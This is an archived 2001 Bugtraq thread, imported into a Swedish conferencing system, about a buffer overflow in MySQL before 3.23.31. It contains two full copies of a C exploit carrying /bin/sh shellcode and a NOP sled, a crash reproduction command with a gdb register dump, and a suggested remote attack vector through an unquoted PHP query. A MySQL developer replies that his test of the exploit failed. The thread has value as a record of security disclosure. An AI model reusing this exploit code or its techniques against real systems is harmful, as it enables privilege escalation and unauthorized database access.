5989804 2001-01-19 22:26 +0000 /221 rader/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Bilagans filnamn: "MySQLXploit.c"
Importerad: 2001-01-23 01:12 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lms@WWW.ISPGAYA.PT
Mottagare: Bugtraq (import) <14925>
Bilaga (text/plain) till text 5989803
Ärende: Bilaga (MySQLXploit.c) till: Re: MySQL Overflow + exploit [ops..sent a broken exploit :P]
------------------------------------------------------------
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st
arg...
Example: ./MySQLX 0 ---> this is the default offset :]
Advisorie:
[from a bugtraq email]
Hi,
all versions of MySQL < 3.23.31 have a buffer-overflow which crashs
the
server and which seems to be exploitable (ie. 4141414 in eip)
Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)
Requirements :
You need a valid login/password to exploit this
Solution :
Upgrade to 3.23.31
Proof-of-concept code :
None
Credits :
I'm not the discoverer of this bug
The first public
report was made by tharbad@kaotik.org via the MySQL
mailing-list
See the following mails for details
Regards,
Nicob
Here the original post to the MySQL mailing-list :
==================================================
On Jan 12, Jo?o Gouveia wrote:
> Hi,
>
> I believe i've found a problem in MySql. Here are some test's i've made in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).Confirmed up to latest 3.23
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
></quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal i got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
>
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> tharbad@kaotik.org
Here the reponse to a email I send today to the MySQL list :
============================================================
Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei
Here an part of the 3.23.30 to 3.23.31 diff :
=============================================
+Changes in release 3.23.31
+--------------------------
+
+ * Fixed security bug in something (please upgrade if you are using a
+ earlier MySQL 3.23 version).
End of Advisorie
Final Words: Yes..i'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...i just wave everybody :]
*/
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned
long get_sp(void) {
__asm__("movl %esp,%eax");
}
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!\n");
printf("Couldn't allocate memory...\n");
printf("Exiting...\n");
exit(0);
}
printf("SUCCESS!\n");
addr=get_sp()-offset;
printf("Using address : 0x%x\n", addr);
printf("Offset : %d\n",offset);
printf("Buffer Size : %d\n",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]='\0';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :P\n");
printf("So...[if all went well], prepare to be r00t...\n");
system(tmp);
}
(5989804) --------------------------------(Ombruten)
5989877 2001-01-19 22:07 +0000 /23 rader/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-23 02:21 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lms@WWW.ISPGAYA.PT
Mottagare: Bugtraq (import) <14932>
Ärende: Re: MySQL < 3.23.31 Overflow [exploit]
------------------------------------------------------------
Hello...
Here's a exploit for this...
[See attached...]
Regardz,
Lus Miguel Silva aka wC
Member of lonoss.org and unsecurity.org
http://www.lonoss.org/
http://www.unsecurity.org/
http://www.ispgaya.pt/ Student
Personal WebPage at:
http://paginas.ispgaya.pt/~lms/
&&
http://www.unsecurity.org/wC/
Personal Code at:
www.unsecurity.org/wC/MyCode/
(5989877) ------------------------------------------
Bilaga (text/plain) i text 5989878
5989878 2001-01-19 22:07 +0000 /217 rader/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Bilagans filnamn: "MySQLXploit.c"
Importerad: 2001-01-23 02:21 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lms@WWW.ISPGAYA.PT
Mottagare: Bugtraq (import) <14933>
Bilaga (text/plain) till text 5989877
Ärende: Bilaga (MySQLXploit.c) till: Re: MySQL < 3.23.31 Overflow [exploit]
------------------------------------------------------------
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st
arg...
Example: ./MySQLX 0 ---> this is the default offset :]
Advisorie:
[from a bugtraq email]
Hi,
all versions of MySQL < 3.23.31 have a buffer-overflow which crashs
the
server and which seems to be exploitable (ie. 4141414 in eip)
Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)
Requirements :
You need a valid login/password to exploit this
Solution :
Upgrade to 3.23.31
Proof-of-concept code :
None
Credits :
I'm not the discoverer of this bug
The first public
report was made by tharbad@kaotik.org via the MySQL
mailing-list
See the following mails for details
Regards,
Nicob
Here the original post to the MySQL mailing-list :
==================================================
On Jan 12, Jo?o Gouveia wrote:
> Hi,
>
> I believe i've found a problem in MySql. Here are some test's i've made in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).Confirmed up to latest 3.23
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
></quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal i got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
>
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> tharbad@kaotik.org
Here the reponse to a email I send today to the MySQL list :
============================================================
Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei
Here an part of the 3.23.30 to 3.23.31 diff :
=============================================
+Changes in release 3.23.31
+--------------------------
+
+ * Fixed security bug in something (please upgrade if you are using a
+ earlier MySQL 3.23 version).
End of Advisorie
Final Words: Yes..i'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...i just wave everybody :]
*/
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define RET_ADDR 0x41414141
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!\n");
printf("Couldn't allocate memory...\n");
printf("Exiting...\n");
exit(0);
}
printf("SUCCESS!\n");
addr=RET_ADDR-offset;
printf("Using address : 0x%x\n", addr);
printf("Offset : %d\n",offset);
printf("Buffer Size : %d\n",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]='\0';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :P\n");
printf("So...[if all went well], prepare to be r00t...\n");
system(tmp);
}
(5989878) --------------------------------(Ombruten)
5993353 2001-01-23 17:47 +0200 /111 rader/ Michael Widenius <monty@MYSQL.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-23 21:05 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: monty@mysql.com
Mottagare: Bugtraq (import) <14949>
Ärende: Re: MySQL < 3.23.31 Overflow [exploit] (fwd)
------------------------------------------------------------
From: Michael Widenius <monty@MYSQL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <14957.42910.912031.978457@narttu.mysql.com>
Hi!
I got forwarded this 'exploit' of MySQL:
Lus> Hello...
Lus> Here's a exploit for this...
Lus> [See attached...]
Lus> Regardz,
Lus> Lus Miguel Silva aka wC
Lus> Member of lonoss.org and unsecurity.org
Lus> http://www.lonoss.org/
Lus> http://www.unsecurity.org/
Lus> http://www.ispgaya.pt/ Student
Lus> Personal WebPage at:
Lus> http://paginas.ispgaya.pt/~lms/
Lus> &&
Lus> http://www.unsecurity.org/wC/
Lus> Personal Code at:
Lus> www.unsecurity.org/wC/MyCode/
Lus> /*
Lus> Linux MySQL Exploit by Luis Miguel Silva [aka wC]
Lus> lms@ispgaya.pt
Lus> 19/01/y2k+1
Lus> Compile:
Lus> gcc MySQLXploit.c -o MySQLX
Lus> Run with:
Lus> You can specify the offset for the exploit passing it as the 1st arg...
Lus> Example: ./MySQLX 0 ---> this is the default offset :]
Lus> Advisorie:
Lus> [from a bugtraq email]
Lus> Hi,
Lus> all versions of MySQL < 3.23.31 have a buffer-overflow which
crashs the Lus> server and which seems to be exploitable
(ie. 4141414 in eip)
Lus> Problem : Lus> An attacker could gain mysqld privileges
(gaining access to all the Lus> databases)
Lus> Requirements :
Lus> You need a valid login/password to exploit this
Lus> Solution :
Lus> Upgrade to 3.23.31
Lus> Proof-of-concept code :
Lus> None
Lus> Credits : Lus> I'm not the discoverer of this bug Lus> The
first public report was made by tharbad@kaotik.org via the MySQL Lus>
mailing-list Lus> See the following mails for details
Lus> Regards,
Lus> Nicob
<cut>
I have looked at the 'exploit' and tested this against a 3.23.30
server, but it didn't work. The server gave nicely the error:
-----------------
(/my/tmp) exploit 0
MySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt
Trying to allocate memory for buffer (130 bytes)...SUCCESS!
Using address : 0x41414141
Offset : 0
Buffer Size : 130
Oh k...i have the evil'buffer right here :P
So...[if all went well], prepare to be r00t...
Enter password:
ERROR 1064 at line 1: You have an error in your SQL syntax near '^1ÀFF
°
óV
Í1ÛØ@ÍèÜÿÿÿ/bin/shAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' at line 1
-------------
I can't see how this particular exploit could work, as MySQL strips
all not-ASCII characters from the column name and stops as the first
not-ASCII character. In other words, an exploit like this could
theoretically work if the assembler code only used bytes in this
region, but as this particular program didn't do that...
Anyway, this is just a typical example why one should be careful of
not running mysqld as root, but as it's own user.
Regards,
Monty
(5993353) --------------------------------(Ombruten)
5993976 2001-01-23 04:29 +0000 /57 rader/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-23 23:12 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: tharbad@kaotik.org
Mottagare: Bugtraq (import) <14963>
Kommentar till text 5979526 av Nicolas GREGOIRE <nicolas.gregoire@7THZONE.COM>
Ärende: Re: Buffer overflow in MySQL < 3.23.31
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <004301c084f5$0d7e2a40$0400a8c0@corbusier.org>
Hi,
----- Original Message -----
From: "Nicolas GREGOIRE" <nicolas.gregoire@7THZONE.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Thursday, January 18, 2001 5:44 PM
Subject: Buffer overflow in MySQL < 3.23.31
> Hi,
>
> all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
> server and which seems to be exploitable (ie. 4141414 in eip)
>
> Problem :
> An attacker could gain mysqld privileges (gaining access to all the
> databases)
>
> Requirements :
> You need a valid login/password to exploit this
Not allways, in a default instalation one can exploit like this:
mysql -ustring -e<query> , no need for a valid database, login, nor
password. Also, afaik, this can't easly be exploited just by using a
"select a.(buffer).a" because buffer must be part of a valid SQL
query. I didn't test it, but i supose it's true. The real danger of
this flaw, i think, is the possibility of beeing exploited remotely.
If there is a simple php script ( for example ), that has a sql query
like "$SQL=select * from table where index=$index" ( providing that
$index isn't quoted), one can exploit using somethig like:
script.php?index=a.(buffer).b
>
> Solution :
> Upgrade to 3.23.31
>
> Proof-of-concept code :
> None
>
> Credits :
> I'm not the discoverer of this bug
> The first public report was made by tharbad@kaotik.org via the MySQL
> mailing-list
> See the following mails for details
Best regards,
Joao Gouveia
--------------
tharbad@kaotik.org
(5993976) --------------------------------(Ombruten)
Kommentar i text 5994069 av Hedda (Snäll, trevlig och snygg)